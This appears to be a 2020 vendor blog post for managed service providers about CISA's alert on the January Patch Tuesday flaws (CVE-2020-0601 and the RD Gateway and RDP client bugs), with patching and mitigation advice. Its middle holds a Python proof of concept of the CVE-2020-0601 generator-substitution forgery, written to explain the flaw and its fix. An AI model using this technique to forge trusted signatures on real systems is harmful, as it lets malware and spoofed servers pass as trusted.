January 16, 2020
CISA Issues Alert Over Windows Vulnerability
The push to Windows 10 has not gone without snags. With Windows 7 officially reaching end of life on January 14, 2020, recent reports of vulnerabilities in Windows are less than ideal.
The Cybersecurity and Infrastructure Security Agency (CISA) has released an alert regarding critical vulnerabilities in the Windows OS that are addressed in this month's patch.
On January 14, 2020, Microsoft released fixes for 49 vulnerabilities as part of its monthly Patch Tuesday release. Among them were critical weaknesses in Windows CryptoAPI, Windows Remote Desktop Gateway (RD Gateway), and the Windows Remote Desktop Client. An attacker could exploit these remotely to pass off malicious code or servers as trusted, to decrypt, modify, or inject data on user connections, or to execute arbitrary code:
- CryptoAPI spoofing vulnerability – CVE-2020-0601: This vulnerability affects all 32- and 64-bit editions of Windows 10, as well as Windows Server 2016 and 2019. The flaw is in how CryptoAPI (crypt32.dll) validates Elliptic Curve Cryptography (ECC) certificates: it matches a certificate to a trusted root by public key but does not verify that the certificate's explicitly specified curve parameters are actually the root's, so an attacker who crafts parameters that reproduce a trusted root's public point can produce signatures that validate as if that root had made them. This lets unwanted or malicious software masquerade as authentically signed by a trusted organization, which can deceive users and thwart malware detection methods such as antivirus. A maliciously crafted TLS certificate could likewise be issued for a hostname that did not authorize it, and a browser that relies on Windows CryptoAPI for certificate validation would not issue a warning (Firefox, which uses its own NSS library, is not affected), allowing an attacker to decrypt, modify, or inject data on user connections without detection.
- Windows RD Gateway and Windows Remote Desktop Client vulnerabilities – CVE-2020-0609, CVE-2020-0610, and CVE-2020-0611: The two RD Gateway flaws affect Windows Server 2012 and newer; the client flaw, CVE-2020-0611, affects Windows 7 and newer. All three allow remote code execution. The server vulnerabilities require neither authentication nor user interaction: an attacker sends a specially crafted request to a system running the RD Gateway role, which by design is exposed to the internet. The client vulnerability requires convincing a user to connect to a malicious RDP server.
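The arithmetic behind the CVE-2020-0601 bullet above is easier to see in code. The following is an added example, not code from the original post or from Microsoft or CISA: it implements NIST P-256 and ECDSA in pure Python, then shows that an attacker who may supply explicit curve parameters can pick a generator G' such that their own private key maps to a trusted root's public point, so signatures they make verify under that root's key whenever the verifier takes the generator from the certificate. The CA key, attacker key, nonce, root-store layout, and the two `*_root_match` functions are constructed for this demonstration (they model the pre- and post-patch checks at the level of principle, not crypt32.dll's actual code). Requires Python 3.8+ for `pow(x, -1, m)`.

```python
import hashlib

# NIST P-256 domain parameters (standard constants).
P = 0xffffffff00000001000000000000000000000000ffffffffffffffffffffffff
A = P - 3
B = 0x5ac635d8aa3a93e7b3ebbd55769886bc651d06b0cc53b0f63bce3c3e27d2604b
N = 0xffffffff00000000ffffffffffffffffbce6faada7179e84f3b9cac2fc632551
G = (0x6b17d1f2e12c4247f8bce6e563a440f277037d812deb33a0f4a13945d898c296,
     0x4fe342e2fe1a7f9b8ee7eb4a7c0f9e162bce33576b315ececbb6406837bf51f5)

# Constructed demo keys: assumptions for this example, not real CA material.
CA_PRIV = 0x7f3a5c9e1b2d4f6081a3c5e7f9b1d3f5a7c9e1b3d5f7a9cbde0f123456789abc
ATTACKER_PRIV = 0x2a4c6e8fa1b3c5d7e9fb0d1f2e3c4b5a69788796a5b4c3d2e1f00fedcba98765
# Fixed nonce purely so the run is reproducible; a real signer must use a fresh random or RFC 6979 nonce.
NONCE = 0x5e7d9cbfa2d4e6f8091b3d5f7a9cbde0f1234567890abcdef0123456789abcde


def ec_add(p1, p2):
    """Affine point addition on y^2 = x^3 + A*x + B over GF(P); None is the point at infinity."""
    if p1 is None:
        return p2
    if p2 is None:
        return p1
    x1, y1 = p1
    x2, y2 = p2
    if x1 == x2 and (y1 + y2) % P == 0:
        return None  # Q + (-Q)
    if p1 == p2:
        lam = (3 * x1 * x1 + A) * pow(2 * y1, -1, P) % P
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, P) % P
    x3 = (lam * lam - x1 - x2) % P
    return (x3, (lam * (x1 - x3) - y1) % P)


def ec_mul(k, point):
    """Double-and-add scalar multiplication (not constant-time; demo only)."""
    result = None
    while k:
        if k & 1:
            result = ec_add(result, point)
        point = ec_add(point, point)
        k >>= 1
    return result


def _hash(msg):
    return int.from_bytes(hashlib.sha256(msg).digest(), "big") % N


def ecdsa_sign(priv, msg, gen, k):
    """ECDSA on P-256 with an explicit generator `gen`: the parameter CryptoAPI failed to check."""
    r = ec_mul(k, gen)[0] % N
    s = pow(k, -1, N) * (_hash(msg) + r * priv) % N
    assert r and s, "degenerate nonce; pick another k"
    return (r, s)


def ecdsa_verify(pub, msg, sig, gen):
    """Standard ECDSA verification, again parameterised by the generator the certificate supplies."""
    r, s = sig
    if not (0 < r < N and 0 < s < N):
        return False
    w = pow(s, -1, N)
    u1 = _hash(msg) * w % N
    u2 = r * w % N
    point = ec_add(ec_mul(u1, gen), ec_mul(u2, pub))
    return point is not None and point[0] % N == r


def forge_generator(trusted_pub, attacker_priv):
    """Choose G' = attacker_priv^-1 * Q so that attacker_priv * G' == Q, the trusted root's public point."""
    return ec_mul(pow(attacker_priv, -1, N), trusted_pub)


def vulnerable_root_match(cert_pub, cert_gen, trusted_roots):
    """Pre-patch behaviour (modelled): a root matches on public key alone; explicit parameters are ignored."""
    return any(cert_pub == root["pub"] for root in trusted_roots)


def fixed_root_match(cert_pub, cert_gen, trusted_roots):
    """Post-patch behaviour (modelled): the certificate's curve parameters must match the root's as well."""
    return any(cert_pub == root["pub"] and cert_gen == root["gen"] for root in trusted_roots)


def run_demo():
    ca_pub = ec_mul(CA_PRIV, G)
    trusted_roots = [{"name": "Example Root CA (constructed)", "pub": ca_pub, "gen": G}]
    forged_gen = forge_generator(ca_pub, ATTACKER_PRIV)
    msg = b"constructed: SHA-256 of payload.exe"
    sig = ecdsa_sign(ATTACKER_PRIV, msg, forged_gen, NONCE)
    return {
        "same_public_point": ec_mul(ATTACKER_PRIV, forged_gen) == ca_pub,
        "sig_valid_under_forged_params": ecdsa_verify(ca_pub, msg, sig, forged_gen),
        "sig_valid_under_real_params": ecdsa_verify(ca_pub, msg, sig, G),
        "vulnerable_check_trusts_it": vulnerable_root_match(ca_pub, forged_gen, trusted_roots),
        "fixed_check_trusts_it": fixed_root_match(ca_pub, forged_gen, trusted_roots),
    }


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

The point to take from the run: the attacker never learns the CA's private key. They simply move the generator so that their key lands on the CA's public point, and any verifier that trusts a certificate by public key while taking the curve parameters from the certificate itself will accept their signature. Pinning the parameters to the named curve (the `fixed_root_match` branch) is what closes the hole.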
First and foremost, MSPs and users should ensure they have migrated off Windows 7 and Windows Server 2008/2008 R2. These systems received their final public security updates on January 14 and will get no further fixes outside Microsoft's paid Extended Security Updates program, leaving them permanently exposed to newly discovered flaws and making them a liability to the business. Supported operating systems, such as Windows 10 and Windows Server 2012 and later, should receive the patches referenced in the CISA alert immediately, starting with internet-facing RD Gateway servers and other mission-critical systems. Where an RD Gateway patch must be delayed, disabling the gateway's UDP transport (or blocking UDP port 3391 at the perimeter) removes the attack surface for CVE-2020-0609 and CVE-2020-0610, since public analysis placed both bugs in the UDP transport handling. There is no workaround for CVE-2020-0601; once patched, a system records attempted exploitation as Event ID 1 from the source Microsoft-Windows-Audit-CVE in the Application event log, which is worth forwarding to your monitoring.
Windows 10 patching is automated by default, but deferral policies, paused updates, and pending reboots can leave devices exposed longer than intended. MSPs using Datto RMM can identify exposed devices by filtering for those missing the January 14 cumulative update KB for their OS version and build, and then push the update, and the reboot it requires, immediately.